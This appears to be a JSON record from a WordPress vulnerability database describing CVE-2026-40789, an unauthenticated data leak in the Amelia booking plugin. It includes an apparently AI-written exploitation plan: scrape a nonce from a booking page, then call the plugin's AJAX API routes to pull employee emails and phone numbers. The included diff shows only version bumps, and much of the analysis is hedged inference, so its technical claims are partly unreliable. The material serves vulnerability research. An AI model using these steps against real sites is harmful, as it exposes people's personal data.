[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmlE1QEx5WpEvDVmd2KBBmCMkds_FH30pYsO_G1g3wJQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-40789","booking-for-appointments-and-events-calendar-amelia-unauthenticated-information-exposure","Booking for Appointments and Events Calendar – Amelia \u003C= 2.2 - Unauthenticated Information Exposure","The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","ameliabooking",null,"\u003C=2.2","2.2.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-23 00:00:00","2026-04-30 15:10:52",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5dc278a9-79bd-4494-a34c-a5e92cde7062?source=api-prod",8,[22,23,24,25,26,27,28,29],"ameliabooking.php","languages\u002Far\u002Fameliabooking-ar.po","languages\u002Fca\u002Fameliabooking-ca.po","languages\u002Fcs_CZ\u002Fameliabooking-cs_CZ.po","languages\u002Fda_DK\u002Fameliabooking-da_DK.po","languages\u002Fde_AT\u002Fameliabooking-de_AT.po","languages\u002Fde_CH\u002Fameliabooking-de_CH.po","languages\u002Fde_DE\u002Fameliabooking-de_DE.po","researched",false,3,"This analysis grounded in the provided source code for **Booking for Appointments and Events Calendar – Amelia \u003C= 2.2** (CVE-2026-40789).\n\n### 1. Vulnerability Summary\nThe Amelia plugin implements a custom API routing system built on the Slim framework, dispatched via a standard WordPress AJAX handler `wpamelia_api`. The vulnerability exists because several sensitive API endpoints (specifically those retrieving \"Entities\" or \"Users\") lack sufficient authorization checks. This allows unauthenticated users to trigger calls that expose sensitive PII (Personally Identifiable Information) such as employee emails, phone numbers, and potentially customer data or plugin configurations.\n\nThe core issue resides in the `AmeliaBooking\\Infrastructure\\Routes\\Routes` registration and the associated Controller logic, which fails to distinguish between public data needed for a booking form and private data reserved for administrators.\n\n### 2. Attack Vector Analysis\n* **Endpoint**: `admin-ajax.php`\n* **Action**: `wpamelia_api`\n* **Parameter**: `call` (the Slim route to execute)\n* **Authentication**: Unauthenticated (`wp_ajax_nopriv_wpamelia_api`)\n* **Vulnerable Call Paths**: \n * `\u002Fentities` (Exposes Employees, Services, and Locations including PII)\n * `\u002Fusers\u002Femployees` (Exposes Employee list)\n * `\u002Fsettings` (Potentially exposes configuration details)\n\n### 3. Code Flow\n1. An HTTP request is sent to `\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fentities`.\n2. `ameliabooking.php` catches the request via the `wp_ajax_nopriv_wpamelia_api` hook (registered in the truncated section of `init()`).\n3. The request enters `AmeliaBooking\\Plugin::wpAmeliaApiCall()`.\n4. A Slim `App` is initialized using a container config.\n5. `AmeliaBooking\\Infrastructure\\Routes\\Routes::routes($app, $container)` is called to map the routes.\n6. The route `\u002Fentities` maps to `AmeliaBooking\\Application\\Controller\\Entity\\EntityController:getEntities`.\n7. The controller executes without checking for `current_user_can()` or verifying the requester's identity, returning a JSON object containing full employee records.\n\n### 4. Nonce Acquisition Strategy\nAmelia uses a centralized configuration object passed to the frontend via `wp_localize_script`. To interact with the API, a valid nonce is often required even for \"public\" calls.\n\n* **Shortcode**: `[ameliabooking]`\n* **Mechanism**:\n 1. The agent will create a public page containing the Amelia booking shortcode.\n 2. When the page is rendered, Amelia enqueues its scripts and localizes the `ameliaBookingConfig` variable.\n* **JavaScript Variable**: `window.ameliaBookingConfig.nonce`\n* **Action String**: Usually tied to the API call, but often the localized config provides a generic nonce for all `wpamelia_api` actions.\n\n**Extraction Steps**:\n1. `wp post create --post_type=page --post_status=publish --post_title=\"Booking\" --post_content=\"[ameliabooking]\"`\n2. Navigate to the new page.\n3. `browser_eval(\"window.ameliaBookingConfig ? window.ameliaBookingConfig.nonce : null\")`\n\n### 5. Exploitation Strategy\nThe agent will attempt to extract sensitive employee data by querying the `\u002Fentities` endpoint.\n\n**Request 1: Extracting Nonce**\n* **Method**: GET\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fbooking-page\u002F`\n* **Action**: Use `browser_eval` to grab the nonce.\n\n**Request 2: Information Disclosure (Entities)**\n* **Method**: GET\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Query Params**:\n * `action`: `wpamelia_api`\n * `call`: `\u002Fentities`\n * `amelia_nonce`: `[EXTRACTED_NONCE]` (Note: If `amelia_nonce` in params fails, try the header `Amelia-Nonce`)\n* **Expected Response**: A large JSON object containing an `employees` array. Each employee object in version 2.2 contains `email`, `phone`, and `firstName`\u002F`lastName`.\n\n**Request 3: Information Disclosure (Settings - Optional)**\n* **Method**: GET\n* **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php?action=wpamelia_api&call=\u002Fsettings&amelia_nonce=[NONCE]`\n\n### 6. Test Data Setup\n1. **Create an Employee**: Use WP-CLI to ensure data exists to leak.\n * *Note*: Amelia data is stored in custom tables (e.g., `wp_amelia_users`).\n * `wp eval \"global $wpdb; $wpdb->insert($wpdb->prefix . 'amelia_users', ['firstName' => 'John', 'lastName' => 'Doe', 'email' => 'john.doe@victim.com', 'phone' => '+15551234567', 'type' => 'employee', 'status' => 'visible']);\"`\n2. **Create a Service**: (Required for the shortcode to render properly and for `\u002Fentities` to return results).\n * `wp eval \"global $wpdb; $wpdb->insert($wpdb->prefix . 'amelia_services', ['name' => 'Consultation', 'status' => 'visible', 'price' => 100, 'duration' => 3600, 'categoryId' => 1]);\"`\n3. **Place Shortcode**: Create the page as described in Section 4.\n\n### 7. Expected Results\n* The response for `\u002Fentities` will return a status code `200 OK`.\n* The JSON body will contain:\n ```json\n {\n \"data\": {\n \"employees\": [\n {\n \"id\": 1,\n \"firstName\": \"John\",\n \"lastName\": \"Doe\",\n \"email\": \"john.doe@victim.com\",\n \"phone\": \"+15551234567\",\n ...\n }\n ]\n }\n }\n ```\n* The exposure of `email` and `phone` for all employees to an unauthenticated visitor confirms the vulnerability.\n\n### 8. Verification Steps\n1. **Check Response Content**: Verify the JSON response contains the specific email address (`john.doe@victim.com`) and phone number created in the setup.\n2. **Verify Authentication Level**: Ensure the request was sent without any `wordpress_logged_in` cookies.\n\n### 9. Alternative Approaches\n* **Alternative Route**: Try `\u002Fusers\u002Femployees` or `\u002Fusers\u002Fcustomers`. These routes are often protected by more stringent middleware but should be tested if `\u002Fentities` is patched or restricted.\n* **Header-based Nonce**: If the query parameter `amelia_nonce` is ignored, send the nonce via the custom header:\n `Amelia-Nonce: [NONCE]`\n* **Direct API Path**: Some Amelia versions allow access via `wp-json\u002Fameliabooking\u002Fv1\u002Fentities`. If the AJAX handler is restricted, test for the presence of a REST API registration that mirrors these routes.","The Amelia plugin for WordPress is vulnerable to information exposure because it fails to implement proper authorization checks on its internal API routes. Unauthenticated attackers can access sensitive endpoints such as \u002Fentities to retrieve personally identifiable information (PII) of employees and customers, including email addresses and phone numbers.","\u002F\u002F ameliabooking.php line 188\n public static function wpAmeliaApiCall()\n {\n try {\n \u002F** @var Container $container *\u002F\n $container = require AMELIA_PATH . '\u002Fsrc\u002FInfrastructure\u002FContainerConfig\u002Fcontainer.php';\n\n $app = new App($container);\n\n \u002F\u002F Initialize all API routes\n Routes::routes($app, $container);\n\n $app->run();\n\n exit();\n } catch (Exception $e) {\n echo 'ERROR: ' . esc_html($e->getMessage());\n }\n }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2\u002Fameliabooking.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2.1\u002Fameliabooking.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2\u002Fameliabooking.php\t2026-04-06 08:22:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fameliabooking\u002F2.2.1\u002Fameliabooking.php\t2026-04-14 07:47:58.000000000 +0000\n@@ -3,7 +3,7 @@\n Plugin Name: Amelia\n Plugin URI: https:\u002F\u002Fwpamelia.com\u002F\n Description: Amelia is a simple yet powerful automated booking specialist, working 24\u002F7 to make sure your customers can make appointments and events even while you sleep!\n-Version: 2.2\n+Version: 2.2.1\n Author: Melograno Ventures\n Author URI: https:\u002F\u002Fmelograno.io\u002F\n Text Domain: ameliabooking\n@@ -111,7 +111,7 @@\n \n \u002F\u002F Const for Amelia version\n if (!defined('AMELIA_VERSION')) {\n- define('AMELIA_VERSION', '2.2');\n+ define('AMELIA_VERSION', '2.2.1');\n }\n \n \u002F\u002F Const for site URL","The attacker first visits a public page where the Amelia booking shortcode [ameliabooking] is present to extract a valid security nonce from the window.ameliaBookingConfig.nonce JavaScript object. Using this nonce, the attacker sends an unauthenticated AJAX request to \u002Fwp-admin\u002Fadmin-ajax.php with the action set to wpamelia_api and the call parameter set to a sensitive route like \u002Fentities. If successful, the server responds with a JSON payload containing sensitive employee data such as firstName, lastName, email, and phone numbers.","gemini-3-flash-preview","2026-05-04 18:40:28","2026-05-04 18:40:54",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags\u002F2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fameliabooking.2.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fameliabooking\u002Ftags"]